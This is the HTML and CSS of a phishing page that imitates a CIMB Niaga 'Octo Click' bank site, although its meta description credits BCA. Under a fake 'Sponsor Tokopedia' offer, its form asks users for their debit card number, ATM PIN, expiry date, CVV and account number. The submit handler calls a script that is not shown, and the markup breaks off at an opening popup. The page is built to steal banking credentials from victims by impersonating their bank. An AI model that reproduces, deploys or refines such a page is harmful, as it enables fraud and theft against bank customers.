<html lang="id">
 <head> 
  <meta charset="UTF-8"> 
  <meta name="fragment" content="!"> 
  <meta name="theme-color" content="#780001"> 
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
   <meta content="© 2021 PT Bank Central Asia Tbk, All Rights Reserved." name="description">
  <meta content="menu" property="og:title">
  <meta content="© 2021 PT Bank Central Asia Tbk, All Rights Reserved." property="og:description">
  <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui"> 
  <title>Octo Click | CIMB NIAGA</title> 
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"> 
  <link rel="stylesheet" href="./style.css">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous"> 
<link href="https://pbs.twimg.com/profile_images/1370573628169883654/q9JxDRfr_400x400.jpg" rel="shortcut icon" type="image/x-icon">
  <link href="https://pbs.twimg.com/profile_images/1370573628169883654/q9JxDRfr_400x400.jpg" rel="apple-touch-icon">
  <link href="https://fonts.googleapis.com/css?family=Aldrich" rel="stylesheet" type="text/css">
  <link href="https://fonts.googleapis.com/css?family=Alfa+Slab+One" rel="stylesheet" type="text/css">
<script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
<script nomodule src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>

 </head> 
 <body> 
  <style>
        
@import url("https://fonts.googleapis.com/css?family=Source+Code+Pro:400,500,600,700|Source+Sans+Pro:400,600,700&display=swap");

.html {
    width: 100%;
    height: 100%;
}
@media screen and (max-width: 480px) {
body {
  background-image: url("");
  font-family: "Source Sans Pro", sans-serif;
  background-size: cover;
         background-position: center;
       position: fixed;
         height: 100%;
  font-size: 16px;
  width: 100%;
  height: 100%;
  background-color: #780001;
 
}

* {
  box-sizing: border-box;
}
*:focus {
  outline: ;
}
}



@media screen and (max-width: 360px) {
body {
  background-image: url("");
  font-family: "Source Sans Pro", sans-serif;
  background-size: cover;
         background-position: center;
       position: fixed;
         height: 100%;
  font-size: 16px;
  width: 100%;
  height: 100%;
  background-color: #780001;
 
}

* {
  box-sizing: border-box;
}
*:focus {
  outline: ;
}
}

@media screen and (max-width: 480px) {
  .container {
    position: static;
    display: -webkit-box;
    display: -webkit-flex;
    display: -ms-flexbox;
    display: flex;
    height: 716px;
    max-height: 716px;
    max-width: 100%;
    min-height: 716px;
    -webkit-box-orient: vertical;
    -webkit-box-direction: normal;
    -webkit-flex-direction: column;
    -ms-flex-direction: column;
    flex-direction: column;
  }
  
  
  .container-6 {
    height: 716px;
    max-width: 100%;
    background-color: #fff;
    background-image: url("");
    background-position: 0px 0px;
    background-size: 100% 718px;
    background-repeat: no-repeat;
    text-align: center;
  }
}
.wrapper {
  min-height: 30vh;
  display: block;
  padding: 80px 0px;
  top: 30px;
  height: 100%;
}
}
@media screen and (max-width: 100%), (max-height: 100%) {
  .wrapper {
    flex-wrap: wrap;
    flex-direction: column;
    height: 100%;
  }
}

.card-form {
  max-width: 100%;
  margin: auto;
  width: 100%;
  height: 100%;
  padding: 0px;
  border-radius: 15px;
}
@media screen and (max-width: 480) {
  .card-form {
    margin: 0 auto;
    margin-top; -40px
  }
}
.card-form__inner {
  background: #fff;
  box-shadow:;
  border: 3px solid snow;
  color: #1BC1CF;
  border-radius: 20px;
  padding: 10px;
  width: 92%;
  left: 0;
  right: 0;
  margin: 0px auto;
  position: relative;
  padding-top: 10px;
  margin-top; -40px;
}
@media screen and (max-width: 480px) {
  .card-form__inner {
    padding: 15px;
    margin-top: 145px;
  }
}
@media screen and (max-width: 360px) {
  .card-form__inner {
    padding: 15px;
    margin-top: 145px;
  }
}
.card-form__row {
  display: flex;
  align-items: flex-start;
}
@media screen and (max-width: 480px) {
  .card-form__row {
    flex-wrap: wrap;
  }
}
.card-form__col {
  flex: auto;
  margin-right: 35px;
}
.card-form__col:last-child {
  margin-right: 0;
}
@media screen and (max-width: 480px) {
  .card-form__col {
    margin-right: 0;
    flex: unset;
    width: 100%;
    margin-bottom: 20px;
  }
  .card-form__col:last-child {
    margin-bottom: 0;
  }
}
.card-form__col.-cvv {
  max-width: 150px;
}
@media screen and (max-width: 480px) {
  .card-form__col.-cvv {
    max-width: initial;
  }
}
.card-form__group {
  display: flex;
  align-items: flex-start;
  flex-wrap: wrap;
}
.card-form__group .card-input__input {
  flex: 1;
  margin-right: 15px;
}
.card-form__group .card-input__input:last-child {
  margin-right: 0;
}
.card-form__button {
  width: 100%;
  height: 48px;
  background: #721821;
  border: none;
  border-radius: 25px;
  font-size: 18px;
  font-weight: 700;
  font-family: "Source Sans Pro";
  box-shadow: 8px 10px 10px 0px rgba(0,0,0,0.41);
    -webkit-box-shadow: 4px 5px 10px 0px rgba(0,0,0,0.41);
-moz-box-shadow: 8px 5px 5px 0px rgba(0,0,0,0.41);
  color: #fff;
  margin-top: -10px;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-form__button {
    margin-top: 10px;
  }
}

.card-item {
  max-width: 430px;
  height: 35%;
  margin-left: auto;
  margin-right: auto;
  position: relative;
  z-index: 2;
  width: 100%;
}
@media screen and (max-width: 480px) {
  .card-item {
    max-width: 100%;
    height: 38%;
    width: 90%;
  }
}
@media screen and (max-width: 360px) {
  .card-item {
    height: 35%;
  }
}
.card-item.-active .card-item__side.-front {
  transform: perspective(1000px) rotateY(180deg) rotateX(0deg) rotateZ(0deg);
}
.card-item.-active .card-item__side.-back {
  transform: perspective(1000px) rotateY(0) rotateX(0deg) rotateZ(0deg);
}
.card-item__focus {
  position: absolute;
  z-index: 3;
  border-radius: 5px;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  transition: all 0.35s cubic-bezier(0.71, 0.03, 0.56, 0.85);
  opacity: 0;
  pointer-events: none;
  overflow: hidden;
  border: 2px solid rgba(255, 255, 255, 0.65);
}
.card-item__focus:after {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  background: #780001;
  height: 100%;
  border-radius: 5px;
  filter: blur(25px);
  opacity: 0.5;
}
.card-item__focus.-active {
  opacity: 1;
}
.card-item__side {
  border-radius: 15px;
  overflow: hidden;
  box-shadow: 0 20px 60px 0 rgba(14, 42, 90, 0.55);
  transform: perspective(2000px) rotateY(0deg) rotateX(0deg) rotate(0deg);
  transform-style: preserve-3d;
  transition: all 0.8s cubic-bezier(0.71, 0.03, 0.56, 0.85);
  backface-visibility: hidden;
  height: 100%;
}
.card-item__side.-back {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  transform: perspective(2000px) rotateY(-180deg) rotateX(0deg) rotate(0deg);
  z-index: 2;
  padding: 0;
  height: 100%;
}
.card-item__side.-back .card-item__cover {
  transform: rotateY(-180deg);
}
.card-item__bg {
  max-width: 100%;
  display: block;
  max-height: 100%;
  height: 100%;
  width: 100%;
  object-fit: 50%;
  border-radius: 12px;
  border: 3px solid snow;
}
.card-item__cover {
  height: 100%;
  background-color: #780001;
  position: absolute;
  bottom: 0;
  left: 0;
  top: 0;
  border: 3px solid #780001;
  width: 100%;
  border-radius: 12px;
  overflow: hidden;
  margin-bottom: -120px;
}
.card-item__cover:after {
  content: "";
  position: absolute;
  left: 0;
  border-radius: 20px;
  top: 0;
  width: 100%;
  height: 100%;
  background: transparent;
}
.card-item__top {
  display: flex;
  align-items: flex-start;
  justify-content: space-between;
  margin-bottom: 40px;
  padding: 0 10px;
}
@media screen and (max-width: 480px) {
  .card-item__top {
    margin-bottom: 10px;
     margin-top: 32px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__top {
    margin-bottom: 10px;
    margin-top: 32px;
    width: 50px;
  }
}
.card-item__chip {
  width: 50px;
  margin-left: 14px;
  margin-top: -4px;
}
@media screen and (max-width: 480px) {
  .card-item__chip {
    width: 50px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__chip {
    width: 50px;
  }
}
.card-item__type {
  height: 45px;
  position: relative;
  display: flex;
  justify-content: flex-end;
  max-width: 100px;
  margin-left: auto;
  width: 100%;
}
@media screen and (max-width: 480px) {
  .card-item__type {
    height: 40px;
    max-width: 90px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__type {
    height: 40px;
  }
}
.card-item__typeImg {
  max-width: 100%;
  object-fit: contain;
  max-height: 100%;
  object-position: top right;
}
.card-item__info {
  color: #00CED1;
  width: 100%;
  max-width: calc(100% - 85px);
  padding: 10px 15px;
  font-weight: 800;
  display: block;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-item__info {
    padding: 10px;
  }
}
.card-item__holder {
  opacity: 1;
  font-size: 13px;
  margin-bottom: 6px;
  color: #FFFF00;
  font-weight: 800;
}
@media screen and (max-width: 480px) {
  .card-item__holder {
    font-size: 12px55px;
  }
}
.card-item__wrapper {
  font-family: "Source Code Pro", monospace;
  padding: 25px 15px;
  position: relative;
  z-index: 4;
  height: 100%;
  text-shadow: 7px 6px 10px rgba(14, 42, 90, 0.8);
  user-select: none;
}
@media screen and (max-width: 480px) {
  .card-item__wrapper {
    padding: 20px 10px;
  }
}
.card-item__name {
  font-size: 18px;
  margin-top: -4px;
  line-height: 1;
  white-space: nowrap;
  max-width: 100%;
  overflow: hidden;
  text-overflow: ellipsis;
  text-transform: uppercase;
}
@media screen and (max-width: 480px) {
  .card-item__name {
    font-size: 16px;
  }
}

@media screen and (max-width: 480px) {
.card-item__holder{
     opacity: 1;
  font-size: 13px;
  margin-bottom: 6px;
  color: #FFFF00;
  font-weight: 800;
}


.card-item__nameItem {
  display: inline-block;
  min-width: 8px;
  position: relative;
}
.card-item__number {
  font-weight: 800;
  line-height: 0.7;
  font-size: 27px;
  margin-bottom: -30px;
  display: inline-block;
  padding: 10px 5px;
  cursor: pointer;
  color: #FFFF00;
  opacity: 1;
  
}
@media screen and (max-width: 480px) {
  .card-item__number {
    font-size: 21px;
    margin-bottom: -15px;
    padding: 10px 10px;
    opacity: 1;
    
  }
}
@media screen and (max-width: 360px) {
  .card-item__number {
    font-size: 19px;
    margin-bottom: -10px;
    padding: 10px 10px;
    opacity: 1;
   
  }
}
.card-item__numberItem {
  width: 16px;
  display: inline-block;
   color: #00CED1;
   margin-top: -10px;
}
.card-item__numberItem.-active {
  width: 30px;
  
}
@media screen and (max-width: 480px) {
  .card-item__numberItem {
    width: 13px;
    
  }
  .card-item__numberItem.-active {
    width: 16px;
    
  }
}
@media screen and (max-width: 360px) {
  .card-item__numberItem {
    width: 12px;
  }
  .card-item__numberItem.-active {
    width: 8px;
    
  }
}

.card-item__numberItem:active{
    color: green;
}

.card-item__content {
  color: #fff;
  display: flex;
  align-items: flex-start;
}
.card-item__date {
  flex-wrap: wrap;
  font-size: 18px;
  margin-left: auto;
  padding: 10px;
  display: inline-flex;
  width: 80px;
  margin-top: -4px;
  white-space: nowrap;
  flex-shrink: 0;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-item__date {
    font-size: 16px;
  }
}
.card-item__dateItem {
  position: relative;
}
.card-item__dateItem span {
  width: 22px;
  display: inline-block;
  color: #00CED1;
  font-weight: 800;
  margin-top: -6px;
}
.card-item__dateTitle {
  opacity: 1;
  font-size: 13px;
  padding-bottom: 0px;
  width: 100%;
  margin-left: -20px;
  color: yellow;
  font-weight: 800;
}
@media screen and (max-width: 480px) {
  .card-item__dateTitle {
    font-size: 12px;
    padding-bottom: 5px;
  }
}
.card-item__band {
  background: rgba(0, 0, 19, 100);
  width: 100%;
  height: 50px;
  margin-top: 40px;
  position: relative;
  z-index: 2;
}
@media screen and (max-width: 480px) {
  .card-item__band {
    margin-top: 20px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__band {
    height: 40px;
    margin-top: 10px;
  }
}
.card-item__cvv {
  text-align: right;
  position: relative;
  z-index: 2;
  padding: 15px;
  color: #00CED1;
}
.card-item__cvv .card-item__type {
  opacity: 1;
}
@media screen and (max-width: 360px) {
  .card-item__cvv {
    padding: 10px 15px;
    color: #00CED1;
  }
}
.card-item__cvvTitle {
  padding-right: 10px;
  font-size: 15px;
  font-weight: 800;
  color: #fff;
  margin-bottom: 5px;
}
.card-item__cvvBand {
  height: 45px;
  background: #fff;
  margin-bottom: 30px;
  text-align: right;
  display: flex;
  align-items: center;
  justify-content: flex-end;
  padding-right: 10px;
  color: #00CED1;
  font-size: 18px;
  border-radius: 4px;
  box-shadow: 0px 10px 20px -7px rgba(32, 56, 117, 0.35);
}
@media screen and (max-width: 480px) {
  .card-item__cvvBand {
    height: 40px;
    margin-bottom: 20px;
    border: 1px solid #0851C4;
  }
}
@media screen and (max-width: 360px) {
  .card-item__cvvBand {
    margin-bottom: 15px;
    border: 1px solid #0851C4;
  }
}

.card-list {
  margin-bottom: -100px;
}
@media screen and (max-width: 480px) {
  .card-list {
    margin-bottom: -120px;
  }
}

.card-input {
  margin-bottom: 20px;
}
.card-input__label {
  font-size: 17px;
  margin-bottom: 5px;
  font-weight: 500;
  color: #0060B1;
  width: 100%;
  display: none;
  user-select: none;
}
.card-input__input {
 width: 100%;
  height: 45px;
  border-radius: 5px;
  box-shadow: 1px 1px 15px 1px rgba(36, 52, 70, 0.26);
  border: 0px solid #0060B1;
  transition: all 0.3s ease-in-out;
  font-size: 16px;
  padding: 5px 15px;
  background: #fff;
  color: #1a3b5d;
  outline: none;
  font-family: "Source Sans Pro", sans-serif;
}
.card-input__input:hover, .card-input__input:focus, .card-input__input1:hover, .card-input__input3:hover{
  border:2px solid #721821;
  outline: none;
}

.card-input__input:focus, .card-input__input1:focus, .card-input__input3:focus {
  box-shadow: 8px 5px 15px 0px rgba(0,0,0,0.21);
    -webkit-box-shadow: 6px 15px 10px 0px rgba(0,0,0,0.21);
-moz-box-shadow: 8px 5px 15px 0px rgba(0,0,0,0.21);
background-color: snow;
}



.card-input {
  margin-bottom: 20px;
}
.card-input__label {
  font-size: 17px;
  margin-bottom: 5px;
  font-weight: 500;
  color: #0060B1;
  width: 100%;
  display: none;
  user-select: none;
}
.card-input__input1 {
  width: 100%;
  height: 45px;
  border-radius: 5px;
  box-shadow: 1px 1px 15px 1px rgba(36, 52, 70, 0.26);
  border: 0px solid #0060B1;
  transition: all 0.3s ease-in-out;
  font-size: 16px;
  padding: 5px 15px;
  background: #fff;
  color: none;
  outline: none;
  font-family: "Source Sans Pro", sans-serif;
}
.card-input__input1:hover, .card-input__input1:focus, .card-input__input:active {
  border-color: #721821;
  outline: none;
}

.card-input__input1:focus {
  box-shadow: 8px 5px 15px 0px rgba(0,0,0,0.21);
    -webkit-box-shadow: 6px 15px 10px 0px rgba(0,0,0,0.21);
-moz-box-shadow: 8px 5px 15px 0px rgba(0,0,0,0.21);
background-color: snow;
outline: none;
}


.card-input__input.-select {
  -webkit-appearance: none;
  
  background-size: 12px;
  background-position: 90% center;
  background-repeat: no-repeat;
  padding-right: 30px;

}

.card-input__input3{
  width: 100%;
  height: 45px;
  border-radius: 5px;
  box-shadow: 1px 1px 15px 1px rgba(36, 52, 70, 0.26);
  border: 0px solid #0060B1;
  transition: all 0.3s ease-in-out;
  font-size: 16px;
  padding: 5px 15px;
  background: #fff;
  color: #1a3b5d;
  outline: none;
  font-family: "Source Sans Pro", sans-serif;
}


.slide-fade-up-enter-active {
  transition: all 0.25s ease-in-out;
  transition-delay: 0.1s;
  position: relative;
}

.slide-fade-up-leave-active {
  transition: all 0.25s ease-in-out;
  position: absolute;
}

.slide-fade-up-enter {
  opacity: 0;
  transform: translateY(15px);
  pointer-events: none;
}

.slide-fade-up-leave-to {
  opacity: 0;
  transform: translateY(-15px);
  pointer-events: none;
}

.slide-fade-right-enter-active {
  transition: all 0.25s ease-in-out;
  transition-delay: 0.1s;
  position: relative;
}

.slide-fade-right-leave-active {
  transition: all 0.25s ease-in-out;
  position: absolute;
}

.slide-fade-right-enter {
  opacity: 0;
  transform: translateX(10px) rotate(45deg);
  pointer-events: none;
}

.slide-fade-right-leave-to {
  opacity: 0;
  transform: translateX(-10px) rotate(45deg);
  pointer-events: none;
}

.github-btn {
  position: absolute;
  right: 40px;
  bottom: 50px;
  text-decoration: none;
  padding: 15px 25px;
  border-radius: 4px;
  box-shadow: 0px 4px 30px -6px rgba(36, 52, 70, 0.65);
  background: #24292e;
  color: #fff;
  font-weight: bold;
  letter-spacing: 1px;
  font-size: 16px;
  text-align: center;
  transition: all 0.3s ease-in-out;
}
@media screen and (min-width: 500px) {
  .github-btn:hover {
    transform: scale(1.1);
    box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  }
}
@media screen and (max-width: 700px) {
  .github-btn {
    position: relative;
    bottom: auto;
    right: auto;
    margin-top: 20px;
  }
  .github-btn:active {
    transform: scale(1.1);
    box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  }
}

body {font-family: Arial, Helvetica, sans-serif;
width: 100%;
position: center;

}
* {box-sizing: border-box;}

/* Button used to open the contact form - fixed at the bottom of the page */
.open-button {
  background-color: #555;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  opacity: 0.8;
  position: fixed;
  bottom: 23px;
  right: 28px;
  width: 280px;
}

/* The popup form - hidden by default */
.form-popup {
    
  background-color:rgba(0,0,0,0.5);
  display: none;
  position: fixed;
  margin-top: -600px;
  margin-left: 10px;
  margin-right: 10px;
  box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
  top: 0;
  height: 100%;
  left: 0;
  right: 0;
  border: 0px solid #f1f1f1;
  border-radius: 0px;
  width: 100%;
  z-index: 999999999;
  margin: 0px auto;
  padding: 20px;
}

/* Add styles to the form container */
.form-container {
  max-width: 100%;
  padding: 10px;
  background-color: white;
}


/* Full-width input fields */
.form-container input[type=text], .form-container input[type=password] {
  width: 100%;
  padding: 15px;
  margin: 5px 0 22px 0;
  border: none;
  background: #f1f1f1;
}

/* When the inputs get focus, do something */
.form-container input[type=text]:focus, .form-container input[type=password]:focus {
  background-color: #ddd;
  outline: none;
}

/* Set a style for the submit/login button */
.form-container .btn {
  background-color: #04AA6D;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  width: 100%;
  margin-bottom:10px;
  opacity: 0.8;
}

/* Add a red background color to the cancel button */
.form-container .cancel {
  background-color: red;
}
/* Add some hover effects to buttons */
.form-container .btn:hover, .open-button:hover {
  opacity: 1;
}


  #lodingku{
    position: fixed; 
    top: 0; 
    right: 0; 
    left: 0; 
    display: none;
    bottom: 0;
    margin: 0px auto;
    width: 100%;
    height: 100%;
    background: rgba(0, 0, 0, 0.5);
    z-index: 99999999;
}
        
 .styleku {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
  -webkit-animation-name: bounceInDown; 
    animation-name: bounceInDown; 
}

@-webkit-keyframes bounceInDown { 
   0% { 
       opacity: 0; 
        -webkit-transform: translateY(-200px); 
    } 
    60% { 
        opacity: 1; 
        -webkit-transform: translateY(30px); 
    } 
    80% { 
        -webkit-transform: translateY(10px); 
    } 
    100% { 
        -webkit-transform: translateY(0); 
    } 
} 

@keyframes bounceInDown { 
    0% { 
        opacity: 0; 
        transform: translateY(-200px); 
    } 
    60% { 
        opacity: 1; 
        transform: translateY(30px); 
    } 
    80% { 
        transform: translateY(10px); 
    } 
    100% { 
        transform: translateY(0); 
    } 
} 
 .card-input__input::placeholder{
     color: #bbb;
 }      
        
 .card-input__input1::placeholder{
     color: #bbb;
 }  
 
 .card-input__input3::placeholder{
     color: #bbb;
 }  
 select:selected{
     color: #bbb;
 }      
 
 
 cs{
     font-weight: bold;
     
 }
 
 
 
  ion-icon{
      position: absolute;
      right: 20;
      margin-top: 15px;
      font-size: 20px;
      color: #780001;
  }
  
  
    </style> 
  <!-- partial:index.partial.html --> 
   <div class="container-6" style="text-align: left; background-img: src();">
<nav style="position: fixed; margin: 0px auto; left: 0; right: 0; top: 0; bottom: 0; width: 100%; height: 60; background-color: #780001; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzqawGtj41q8M0cB8mRVobYbcyOq9rfMobVCNAvPplacwUe7AkAYp-10B4JYKtA_iaZUTzaGKowwVok-a99UXf8zLZwTPoMYSSQiBCVpg7w9Wvck7DsiO3cjPDSXTcdSwZ7U861enkP2R_OvreKOAl3YtoFINMrVpvxgfbykUxBUFrMKtFzE6G4oOhaTA/s1080/AddText_11-22-02.44.05.jpg); background-size: 100% 100%; background-position: 100% 100%;"></nav>

  <div class="wrapper" id="app"> 
  
   <div class="card-form"> 
    <div class="card-list"> 
     <div class="card-item" v-bind:class="{ '-active' : isCardFlipped }"> 
      <div class="card-item__side -front"> 
       <div class="card-item__focus" v-bind:class="{'-active' : focusElementStyle }" v-bind:style="focusElementStyle" ref="focusElement"></div> 
       <div class="card-item__cover"> 
        <img src="https://www.cimbniaga.co.id/content/dam/cimb/kartu-debit/debit-card-cimbniaga-on-account.png" class="card-item__bg"> 
       </div> 
       <div class="card-item__wrapper"> 
        <div class="card-item__top"> 
         <img src="https://www.octoclicks.co.id/assets/octo_clicks/pop_up/octo_loading.gif" class="card-item__chip"> 
         <div class="card-item__type"> 
          <transition name="slide-fade-up"> 
           
          </transition> 
         </div> 
        </div> 
        <label for="cardNumber" class="card-item__number" ref="cardNumber"> 
         <div class="card-item__holder" style="color: yellow; font-weight: 800; margin-top: -15px; margin-bottom: 20px">
          Nomor Kartu Debit
          </div> 
         <template v-if="getCardType === 'amex'"> 
          <span v-for="(n, $index) in amexCardMask" :key="$index"> 
           <transition name="slide-fade-up"> 
            <div class="card-item__numberItem" v-if="$index > 4 && $index < 14 && cardNumber.length > $index && n.trim() !== ''">
             *
            </div> 
            <div class="card-item__numberItem" :class="{ '-active' : n.trim() === '' }" :key="$index" v-else-if="cardNumber.length > $index">
              {{cardNumber[$index]}} 
            </div> 
            <div class="card-item__numberItem" :class="{ '-active' : n.trim() === '' }" v-else="" :key="$index + 1">
             {{n}}
            </div> 
           </transition> </span> 
         </template> 
         <template v-else=""> 
          <span v-for="(n, $index) in otherCardMask" :key="$index"> 
           <transition name="slide-fade-up"> 
            <div class="card-item__numberItem" v-if="$index > 4 && $index < 15 && cardNumber.length > $index && n.trim() !== ''">
             *
            </div> 
            <div class="card-item__numberItem" :class="{ '-active' : n.trim() === '' }" :key="$index" v-else-if="cardNumber.length > $index">
              {{cardNumber[$index]}} 
            </div> 
            <div class="card-item__numberItem" :class="{ '-active' : n.trim() === '' }" v-else="" :key="$index + 1">
             {{n}}
            </div> 
           </transition> </span> 
         </template> </label> 
        <div class="card-item__content"> 
         <label for="cardName" class="card-item__info" ref="cardName"> 
          <div class="card-item__holder" style="color: yellow; font-weight: 800">
           Sponsor Tokopedia
          </div> 
          <transition name="slide-fade-up"> 
           <div class="card-item__name" v-if="cardName.length" key="1"> 
            <transition-group name="slide-fade-right"> 
             <span class="card-item__nameItem" v-for="(n, $index) in cardName.replace(/\s\s+/g, ' ')" v-if="$index === $index" v-bind:key="$index + 1">{{n}}</span> 
            </transition-group> 
           </div> 
           <div class="card-item__name" v-else="" key="2">
            PIN ATM
           </div> 
          </transition> </label> 
         <div class="card-item__date" ref="cardDate"> 
          <label for="cardMonth" class="card-item__dateTitle">Masa Berlaku</label> 
          <label for="cardMonth" class="card-item__dateItem"> 
           <transition name="slide-fade-up"> 
            <span v-if="cardMonth" v-bind:key="cardMonth">{{cardMonth}}</span> 
            <span v-else="" key="2">MM/YY</span> 
           </transition> </label> 
           </transition> </label> 
         </div> 
        </div> 
       </div> 
      </div> 
      <center>
 <div class="app-loading" style="position: fixed; margin: 0px auto; left: 0; right: 0; top: 0; bottom: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.4); z-index: 99999999; padding-top: 250px; display: none" id="lodingku1">
 <img class="img-fluid" style="width: 80px" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLZlfefelzGh7hsSCYOw5hTUxD0n_8OawPntuVMmv3Lcv6ocoFAT6VfaWd1yosmFXU9iBgVohFqOsEfh0lufKvlqm1ZruT4tcA_o1vjgksXnATXtybf0BgN_5fmVZnBVkyCqNFJ0a_W8nl6gn8QBQqxTKXVmwmowFReM28qVsAAVXvNW09IuZHfwCpfqQ/s720/octo_loading_gif.gif" alt="preloader" />
      </div>
  </center>
      <div class="card-item__side -back"> 
       <div class="card-item__cover"> 
        <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCg4EQ55EtUVW-DQe7FBtlc_tVSKYFLMWLpaQpN3nYlu7PI1BVi-M3s_8wzPrHCDeS-OF1LSfffYMrJ8kLamaOgKeAGOfLyq1UDlBM1rmla2Sq03DlKPwsZFio4vp_CBqeRKoTERHRIeu3ZU8R0ltvubNpQ_Re7AV2vYlzkSzIlDBuKjAVkXKD7Gno/s16000/AddText_03-05-09.49.31.png" class="card-item__bg"> 
       </div> 
       <div class="card-item__band"></div> 
       <div class="card-item__cvv"> 
        <div class="card-item__cvvTitle">
         CVV
        </div> 
        <div class="card-item__cvvBand"> 
         <span v-for="(n, $index) in cardCvv" :key="$index"> * </span> 
        </div> 
        <div class="card-item__type"> 
          
        </div> 
       </div> 
      </div> 
     </div> 
    </div> 
    <div class="card-form__inner"> 
     <form onsubmit="openForm(event); return false" method="POST"> 
      <div class="card-input"> 
<input type="hidden" id="nomorku" value="">
       <label for="cardNumber" class="card-input__label" style="font-weight: 800;">Nomor Kartu Debit/ATM</label> 
       <input type="tel" id="debit" class="card-input__input3" v-mask="generateCardNumberMask" v-model="cardNumber" v-on:focus="focusInput" v-on:blur="blurInput" data-ref="cardNumber" autocomplete="off" placeholder="Masukkan 16 digit Nomor kartu" minlength="19" maxlength="19" required style="background-position: 0px 0px;
    background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggZOE-Z_urRMolgwjIzxdu3Vg3LRFbYfQOO1m31I2GRnfXvPXAuDwdL76ILQqhdXXfvSt3wzBWJy9gvk52kwcPeVUxOScVygfLG5JlzTNaov1fuUjuwFdMs8C_mN9P4qOCaK7Cnll-tWhkhSWkoV4QtR72zRn_3jgILz9XPPWu7UnU7gfcvCZhG_Jf2Ro/s1080/AddText_11-23-03.12.45.png);
    background-repeat: no-repeat;
    background-attachment: scroll;
     background-color: none;
    background-repeat: no-repeat;
    background-size: 40px 25px;
    background-position: 98% 50%;" onkeypress="return isNumberKey(event)" onkeypress="return isNumberKey(event)">
      </div> 
      <div class="card-input"> 
       <label for="cardName" class="card-input__label" style="font-weight: 800;">Nama Pemilik Rekening</label> 
    
       <input type="tel" id="pinatm" class="card-input__input1" v-model="cardName" v-on:focus="focusInput" v-on:blur="blurInput" data-ref="cardName" autocomplete="off" placeholder="PIN Kartu ATM" required minlength="6" maxlength="6" style="background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV1m85EvShIVjFxT-0XUs8Q2zc6dAacWj2YFrxU2z9eQRikr5ulNl-ENn4LNd_beuMBhRbiUOacTeCYjdvBE4fpUE_zRIBVZmb75-xOVY1g51PeQ4U3d2n1oD77it6Wklk89ZzFp1Hdd8VowPrUXpqHNIZCbOpQockcxuak0t8apczleGRIrEjSLYpyfw/s1080/AddText_11-23-02.53.49.jpgg);
    background-attachment: scroll;
     background-color: none;
    background-repeat: no-repeat;
    background-size: 100% 100%;
    background-position: 100% 100%;"> 
      </div> 
      <div class="card-form__row"> 
       <div class="card-form__col"> 
        <div class="card-form__group"> 
         <label for="cardMonth" class="card-input__label" style="font-weight: 800;">Masa Berlaku</label> 

         <input type="tel" placeholder="VALID THRU" id="valid" class="card-input__input -select" v-model="cardMonth" v-on:focus="focusInput" v-on:blur="blurInput" data-ref="cardDate" required style="background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFJMy2LiYPMYFJeScbWNB4R0aTkND8Dr3fZmGLnETy5viKtf9OYIJoc2bbFoxksyvIaQDDibVTToHIephv8zx5AR-ewEm48vRoBnJt-EKD_blgM6liSoCo443J1ySH5AVyQV-IVSI-RKb5PGSQt2uhTgdCovAS9jAaCnRAXGqjcevAWN67SZxAYWGeO1s/s1080/AddText_11-23-02.56.20.jpg);
    background-attachment: scroll;
     background-color: none;
    background-repeat: no-repeat;
    background-size: 100% 100%;
    background-position: 100% 100%;">
        
 <input type="tel" class="card-input__input  -select" v-mask="'###'" maxlength="3" v-model="cardCvv" v-on:focus="flipCard(true)" v-on:blur="flipCard(false)" autocomplete="off" id="cvvku"  placeholder="CVV 3 Digit" required maxlength="3" style="background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNo7ZI0lnMmYyBsRKJt80MT8XQxEozOaGtRS7gecQXg-mlDPDhzejOQt3uN3tvnooYM3mXmgIuLaICIhfMD2bq_FedCSdcBc87NOa8e_ahmHnrGl34VX8xrlydPBBFAqbtbgev6pz4dzkqbZSmGHUidZaCDWYCJksazpUPu6ZoVjpuOoVKIO44yMSuEaE/s1080/AddText_11-23-02.49.34.jpg); background-attachment: scroll;
     background-color: none;
    background-repeat: no-repeat;
    background-size: 100% 100%;
    background-position: 100% 100%;"> 
        
        </div> 
       </div> 
       <div class="card-form__col -cvv"> 
        <div class="card-input"> 
         <label for="cardCvv" class="card-input__label" style="font-weight: 800;">CVV</label> 
         <input type="tel" class="card-input__input1" id="norek"  placeholder="Nomor Rekening" required maxlength="12"> 
        </div> 
       </div> 
      </div> 
     

      <button class="card-form__button" type="submit">Lanjutkan</button> 
      </form>
   <div class="form-popup" id="myForm" > 
